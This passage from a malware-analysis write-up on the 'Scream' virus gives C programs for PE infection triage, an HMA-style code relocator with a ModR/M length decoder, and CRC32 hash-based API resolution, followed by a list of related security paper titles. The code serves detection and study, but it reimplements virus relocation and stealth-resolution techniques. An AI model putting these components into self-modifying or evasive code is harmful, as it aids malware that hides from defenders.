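    int valid;            /* MZ/PE signatures present and headers inside the buffer */
    int nsections;
    int all_rwx;          /* every section carries the RWX bits */
    int last_executable;  /* Scream's infection mark */
    int ep_in_last;       /* entry point inside the last section (EPO keeps it out) */
    uint32_t last_chars;  /* Characteristics of the last section */
} pe_triage_t;

/* GetSection equivalent: NT headers -> first section header -> last section header. */
static const uint8_t *last_section(const uint8_t *img, size_t len, const uint8_t **nt_out, int *nsec_out)
{
    if (len < 0x40 || rd16(img) != 0x5A4D) return NULL;                          /* 'MZ' */
    uint32_t e_lfanew = rd32(img + 0x3c);
    if (e_lfanew > len - 0x18 || rd32(img + e_lfanew) != 0x00004550) return NULL; /* 'PE\0\0' */
    const uint8_t *nt = img + e_lfanew;
    int nsec = rd16(nt + 0x06);                                  /* FileHeader.NumberOfSections */
    const uint8_t *first = nt + 0x18 + rd16(nt + 0x14);          /* + SizeOfOptionalHeader */
    if (nsec == 0 || (size_t)(first - img) + (size_t)nsec * 0x28 > len) return NULL;
    *nt_out = nt; *nsec_out = nsec;
    return first + (nsec - 1) * 0x28;                            /* (NumberOfSections-1) * 28h */
}

pe_triage_t pe_triage(const uint8_t *img, size_t len)
{
    pe_triage_t t = {0};
    const uint8_t *nt; int nsec;
    const uint8_t *last = last_section(img, len, &nt, &nsec);
    if (!last) return t;
    t.valid = 1; t.nsections = nsec; t.all_rwx = 1;
    const uint8_t *first = last - (nsec - 1) * 0x28;
    for (int i = 0; i < nsec; i++)                               /* the "or [eax+24h]" loop, read back */
        if ((rd32(first + i * 0x28 + 0x24) & SCN_RWX) != SCN_RWX) t.all_rwx = 0;
    t.last_chars = rd32(last + 0x24);
    t.last_executable = (t.last_chars & SCN_EXECUTE) != 0;
    uint32_t ep = rd32(nt + 0x28);                               /* OptionalHeader.AddressOfEntryPoint */
    uint32_t va = rd32(last + 0x0c), vs = rd32(last + 0x08);     /* VirtualAddress, VirtualSize */
    t.ep_in_last = ep >= va && ep < va + vs;
    return t;
}

/* Constructed test data: a minimal PE32 header image with nsec sections of 1000h bytes each.
 * Returns the number of bytes written (buf must hold at least 400h bytes). */
size_t build_pe(uint8_t *buf, uint32_t ep, int nsec, const uint32_t *chars)
{
    memset(buf, 0, 0x400);
    wr16(buf, 0x5A4D); wr32(buf + 0x3c, 0x80);                  /* e_lfanew = 80h */
    uint8_t *nt = buf + 0x80;
    wr32(nt, 0x00004550); wr16(nt + 0x04, 0x14c); wr16(nt + 0x06, (uint16_t)nsec);
    wr16(nt + 0x14, 0xE0); wr16(nt + 0x18, 0x10b); wr32(nt + 0x28, ep);   /* PE32 optional header */
    uint8_t *sec = nt + 0x18 + 0xE0;
    for (int i = 0; i < nsec; i++, sec += 0x28) {
        wr32(sec + 0x08, 0x1000); wr32(sec + 0x0c, 0x1000u * (uint32_t)(i + 1));
        wr32(sec + 0x24, chars[i]);
    }
    return (size_t)(sec - buf);
}

int main(void)
{
    static uint8_t img[0x400];
    const uint32_t clean[2]    = {0x60000020u, 0xC0000040u};     /* .text: code|X|R, .data: data|R|W */
    const uint32_t infected[2] = {SCN_RWX, SCN_RWX | 0x40};       /* all RWX, last section executable */
    size_t n = build_pe(img, 0x1100, 2, infected);
    pe_triage_t t = pe_triage(img, n);
    printf("infected-like: all_rwx=%d last_exec=%d ep_in_last=%d\n", t.all_rwx, t.last_executable, t.ep_in_last);
    n = build_pe(img, 0x1100, 2, clean);
    t = pe_triage(img, n);
    printf("clean-like:    all_rwx=%d last_exec=%d ep_in_last=%d\n", t.all_rwx, t.last_executable, t.ep_in_last);
    return 0;
}
```

On a real sample, replace the constructed image with the file contents read into memory; the three flags together (all sections RWX, last section executable, entry point not in the last section) are the combination InfectFile produces, while any one of them alone is common in legitimate packed or hand-built binaries.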
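The DecodeModRM fragment and the HMA routine above both hinge on the same byte-level detail: which ModR/M encodings carry an absolute 32-bit address. The program below is an added example, not code from the paper or from the virus. It implements a 32-bit ModR/M/SIB length decoder, a length engine for a small opcode subset (the virus's ILE covers the full instruction set; the subset here is an assumption chosen to cover the sample), and an HMA-style pass that adds a delta to every operand matching the engine's two cases (opcodes A1h/A3h, and ModR/M with mod=00 rm=101). The sample bytes are hand-assembled for the example and include one [ecx*4+disp32] SIB form to show that such an absolute address passes through unpatched, exactly as the and al,0C7h / cmp al,5 test would leave it.

```c
/* Added example: ModR/M decoding and an HMA-style disp32 relocation pass. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Bytes consumed by ModR/M + SIB + displacement in 32-bit addressing mode.
 * *is_abs is set when the operand is a bare disp32 (mod=00, rm=101), i.e. the
 * case HMA tests with "and al,0C7h / cmp al,5". */
int modrm_len(const uint8_t *p, int *is_abs)
{
    int mod = p[0] >> 6, rm = p[0] & 7, n = 1;
    *is_abs = (p[0] & 0xC7) == 0x05;
    if (mod == 3) return 1;                               /* register operand, no address */
    if (rm == 4) {                                        /* SIB byte follows */
        n++;
        if (mod == 0 && (p[1] & 7) == 5) n += 4;          /* base=101 with mod=00: disp32, no base */
    }
    if (mod == 0 && rm == 5) n += 4;                      /* [disp32] */
    else if (mod == 1) n += 1;                            /* [reg+disp8] */
    else if (mod == 2) n += 4;                            /* [reg+disp32] */
    return n;
}

/* Length engine for a small opcode subset (assumption of this example; the
 * virus's ILE handles the whole set). *disp receives the offset of a 32-bit
 * absolute address inside the instruction, or -1. Returns 0 for unknown opcodes. */
int insn_len(const uint8_t *p, int *disp)
{
    uint8_t op = p[0];
    int is_abs = 0, n;
    *disp = -1;
    if (op == 0xA1 || op == 0xA3) { *disp = 1; return 5; }       /* mov eax,[moffs32] / mov [moffs32],eax */
    if (op == 0x90 || op == 0xC3 || (op >= 0x50 && op <= 0x5F)) return 1;   /* nop, ret, push/pop reg */
    if (op == 0xE8 || op == 0xE9 || op == 0x68 || (op >= 0xB8 && op <= 0xBF)) return 5; /* rel32 / imm32 */
    if (op == 0xEB || op == 0x6A || (op >= 0x70 && op <= 0x7F)) return 2;   /* rel8 / imm8 */
    if (op == 0x01 || op == 0x03 || op == 0x09 || op == 0x0B || op == 0x21 || op == 0x23 ||
        op == 0x29 || op == 0x2B || op == 0x31 || op == 0x33 || op == 0x39 || op == 0x3B ||
        op == 0x85 || op == 0x87 || op == 0x89 || op == 0x8B || op == 0x8D || op == 0xFF) {
        n = modrm_len(p + 1, &is_abs);                           /* ModR/M, no immediate */
        if (is_abs) *disp = 2;
        return 1 + n;
    }
    if (op == 0x81 || op == 0x83 || op == 0xC7) {                /* ModR/M followed by imm32 or imm8 */
        n = modrm_len(p + 1, &is_abs);
        if (is_abs) *disp = 2;
        return 1 + n + (op == 0x83 ? 1 : 4);
    }
    return 0;
}

/* HMA-style pass: walk [code, code+len) and add delta to every absolute disp32.
 * Returns the number of patched operands, or -1 if an instruction could not be
 * decoded (a real engine would silently mis-patch from that point on). */
int hma_relocate(uint8_t *code, size_t len, uint32_t delta)
{
    size_t off = 0;
    int patched = 0;
    while (off < len) {
        int disp, n = insn_len(code + off, &disp);
        if (n <= 0 || off + (size_t)n > len) return -1;
        if (disp >= 0) {
            uint8_t *a = code + off + disp;
            uint32_t v = (uint32_t)a[0] | (uint32_t)a[1] << 8 | (uint32_t)a[2] << 16 | (uint32_t)a[3] << 24;
            v += delta;                                          /* "add [esi], edx" */
            for (int i = 0; i < 4; i++) a[i] = (uint8_t)(v >> (8 * i));
            patched++;
        }
        off += (size_t)n;                                        /* "add esi, ecx" */
    }
    return patched;
}

/* Constructed sample, hand-assembled for 32-bit mode (not taken from the virus):
 *   A1 00 10 40 00          mov eax,[00401000h]          patched
 *   8B 0D 04 10 40 00       mov ecx,[00401004h]          patched
 *   8B 45 08                mov eax,[ebp+8]              left alone
 *   FF 15 10 10 40 00       call [00401010h]             patched
 *   8B 04 8D 20 10 40 00    mov eax,[ecx*4+00401020h]    left alone: SIB form fails the C7h/05h test
 *   C3                      ret                                                              */
static const uint8_t sample[] = {
    0xA1,0x00,0x10,0x40,0x00, 0x8B,0x0D,0x04,0x10,0x40,0x00, 0x8B,0x45,0x08,
    0xFF,0x15,0x10,0x10,0x40,0x00, 0x8B,0x04,0x8D,0x20,0x10,0x40,0x00, 0xC3 };

int main(void)
{
    uint8_t buf[sizeof sample];
    memcpy(buf, sample, sizeof sample);
    int patched = hma_relocate(buf, sizeof buf, 0x1000);        /* move the code up by 1000h */
    printf("patched %d operands:", patched);
    for (size_t i = 0; i < sizeof buf; i++) printf(" %02X", buf[i]);
    printf("\n");
    return 0;
}
```

The SIB case is the practical lesson: the engine's test is correct for the encodings its own body uses, but a relocator built this way is only as good as its length engine and its list of operand forms, and a single unknown opcode desynchronises the walk for everything that follows.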
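The FRC_MakeCRC32Table block above is the set-up half of the virus's stealth API resolution: names in, hashes out. The program below is an added example and is not the paper's or the virus's code. It builds the same kind of table from a NUL-separated name list with the standard CRC32 (polynomial EDB88320h, reflected, initial and final value FFFFFFFFh) and then resolves an export by hash the way a StealthAPI-style resolver would; that GetCRC32OfString uses exactly this CRC32 variant is an assumption of the example, and the export list stands in for a real export directory.

```c
/* Added example: CRC32 API-name hashing and hash-based export resolution. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static uint32_t crc_table[256];

static void crc32_init(void)
{
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++) c = (c & 1) ? 0xEDB88320u ^ (c >> 1) : c >> 1;
        crc_table[i] = c;
    }
}

/* Standard CRC32 of a NUL-terminated string (assumed to match GetCRC32OfString). */
uint32_t crc32_str(const char *s)
{
    if (!crc_table[1]) crc32_init();
    uint32_t c = 0xFFFFFFFFu;
    for (; *s; s++) c = crc_table[(c ^ (uint8_t)*s) & 0xFF] ^ (c >> 8);
    return c ^ 0xFFFFFFFFu;
}

/* FRC_MakeCRC32Table equivalent: names are consecutive NUL-terminated strings
 * ended by an empty string ("mov al,[esi] / test al,al"); one hash is stored
 * per name ("call GetCRC32OfString / stosd"). Returns the number of hashes. */
size_t make_crc32_table(const char *names, uint32_t *out, size_t cap)
{
    size_t n = 0;
    while (*names && n < cap) {
        out[n++] = crc32_str(names);
        names += strlen(names) + 1;
    }
    return n;
}

/* What a StealthAPI-style resolver does with the table: hash each export name
 * of the module and return the index whose hash matches, -1 if none does. */
int resolve_by_hash(const char *const *exports, size_t nexports, uint32_t hash)
{
    for (size_t i = 0; i < nexports; i++)
        if (crc32_str(exports[i]) == hash) return (int)i;
    return -1;
}

/* Constructed data: a name list in the virus's format and a stand-in export table. */
static const char kernel32_names[] = "CreateFileA\0CloseHandle\0MapViewOfFile\0UnmapViewOfFile\0";
static const char *const fake_exports[] = {
    "CloseHandle", "CreateFileA", "GetTickCount", "MapViewOfFile", "UnmapViewOfFile" };
#define NFAKE (sizeof fake_exports / sizeof fake_exports[0])

int main(void)
{
    uint32_t table[8];
    size_t n = make_crc32_table(kernel32_names, table, 8);
    for (size_t i = 0; i < n; i++)
        printf("hash %08X -> export #%d\n", table[i], resolve_by_hash(fake_exports, NFAKE, table[i]));
    return 0;
}
```

For detection the same routine runs the other way round: hash a list of interesting API names once, then search a sample's data for consecutive dwords equal to those hashes; the name list is absent from the binary, but the hash table is not.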
How Compilers Work. by Walter Bright. Digital Mars
How Compilers Work by Walter Bright Digital Mars Compilers I've Built D programming language C++ C Javascript Java A.B.E.L Compiler Compilers Regex Lex Yacc Spirit Do only the easiest part Not very customizable
Harnessing Intelligence from Malware Repositories
Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette [email protected], [email protected] 7/22/2015 (C) 2015
Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection
USENIX Security Symposium 2014, San Diego, CA, USA Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection Lucas Davi Intel Collaborative Research Institute for
Phoenix Technologies Ltd.
PC Division Desktop Product Line Subject: Standard BIOS 32-bit Service Directory Proposal Revision: 0.4 Revision Date: June 22, 1993 Document ID: Author: ATBIOS Thomas C. Block Origin Date: May 24, 1993
Test Driven Development in Assembler a little story about growing software from nothing
Test Driven Development in Assembler a little story about growing software from nothing Olve Maudal During the last decade Test-Driven Development has become an established practice for developing software
Instruction Set Architecture
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture Randal E. Bryant adapted by Jason Fritts http://csapp.cs.cmu.edu CS:APP2e Hardware Architecture - using Y86 ISA For learning aspects
An Analysis of the Excel 2007 65535 Bug
An Analysis of the Excel 2007 65535 Bug Chris Lomont, www.lomont.org, Nov 2007, Version 1.2 1 Overview On September 22, 2007, a serious Excel 2007 bug was reported on a newsgroup [7] and was soon featured
Embedded x86 Programming: Protected Mode
by JEAN GAREAU Embedded x86 Programming: Protected Mode The x86 architecture is ubiquitous on the desktop and is spilling over into embedded systems environments. This article begins a series designed
Violating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [[email protected]] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
White paper: August 2008. Marcin Icewall Noga [email protected]
White paper: GetCodec Multimedia Trojan Analysis August 2008 Marcin Icewall Noga [email protected] 1. Introduction Recently a new trojan was spotted spreading in the wild, infecting multi-media files
Anti-RE Techniques in DRM Code
Anti-RE Techniques in DRM Code Jan Newger Seminar Advanced Exploitation Techniques RWTH Aachen, Germany [email protected] ABSTRACT In order to prevent music from being copied among consumers, content
Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques
Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques By Omri Herscovici & Liran Englender January 04, 2015 Preface In recent years, exploit-kits are one of the most common platforms
Syscall Proxying - Simulating remote execution Maximiliano Caceres <[email protected]> Copyright 2002 CORE SECURITY TECHNOLOGIES
Syscall Proxying - Simulating remote execution Maximiliano Caceres Copyright 2002 CORE SECURITY TECHNOLOGIES Table of Contents Abstract.........................................................................................
Identification and Removal of
RIVERSIDE RESEARCH INSTITUTE Deobfuscator: An Automated Approach to the Identification and Removal of Code Obfuscation Ei Eric Laspe, Reverse Engineer Jason Raber, Lead Reverse Engineer Overview The Problem:
BCD (ASCII) Arithmetic. Where and Why is BCD used? Packed BCD, ASCII, Unpacked BCD. BCD Adjustment Instructions AAA. Example
BCD (ASCII) Arithmetic We will first look at unpacked BCD which means strings that look like '4567'. Bytes then look like 34h 35h 36h 37h OR: 04h 05h 06h 07h x86 processors also have instructions for packed
PCI BIOS SPECIFICATION. Revision 2.1
PCI BIOS SPECIFICATION Revision 2.1 August 26, 1994 ii PCI BIOS Specification Revision 2.1 REVISION REVISION HISTORY DATE 1.0 Original issue distributed by Intel 9/28/92 2.0 Updated to be in synch with
MACHINE ARCHITECTURE & LANGUAGE
in the name of God the compassionate, the merciful notes on MACHINE ARCHITECTURE & LANGUAGE compiled by Jumong Chap. 9 Microprocessor Fundamentals A system designer should consider a microprocessor-based
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture CS:APP2e Instruction Set Architecture Assembly Language View Processor state Registers, memory, Instructions addl, pushl, ret, How instructions
Analysis and Diversion of Duqu s Driver
Analysis and Diversion of Duqu s Driver Guillaume Bonfante, Jean-Yves Marion, Fabrice Sabatier, Aurélien Thierry To cite this version: Guillaume Bonfante, Jean-Yves Marion, Fabrice Sabatier, Aurélien Thierry.
Using MMX Instructions to Convert RGB To YUV Color Conversion
Using MMX Instructions to Convert RGB To YUV Color Conversion Information for Developers and ISVs From Intel Developer Services www.intel.com/ids Information in this document is provided in connection
Attacking x86 Windows Binaries by Jump Oriented Programming
Attacking x86 Windows Binaries by Jump Oriented Programming L. Erdődi * * Faculty of John von Neumann, Óbuda University, Budapest, Hungary [email protected] Abstract Jump oriented programming
Static detection of C++ vtable escape vulnerabilities in binary code
Static detection of C++ vtable escape vulnerabilities in binary code David Dewey Jonathon Giffin School of Computer Science, Georgia Institute of Technology {ddewey, giffin}@gatech.edu Abstract Static
Hacking the Preboot execution Environment
Hacking the Preboot execution Environment Using the BIOS network stack for other purposes Julien Vanegue [email protected] CESAR Recife Center for Advanced Studies and Systems, Brasil. September 27, 2008
Egil Aspevik Martinsen Polymorphic Viruses. Material from Master Thesis «Detection of Junk Instructions in Malicious Software»
Egil Aspevik Martinsen Polymorphic Viruses Material from Master Thesis «Detection of Junk Instructions in Malicious Software» 1 History 1982 Elk Cloner Brain 1987 1260 1992 Ply 1997 Melissa ILOVEYOU Zmist
For a 64-bit system. I - Presentation Of The Shellcode
#How To Create Your Own Shellcode On Arch Linux? #Author : N3td3v!l #Contact-mail : [email protected] #Website : Nopotm.ir #Spcial tnx to : C0nn3ct0r And All Honest Hackerz and Security Managers I - Presentation
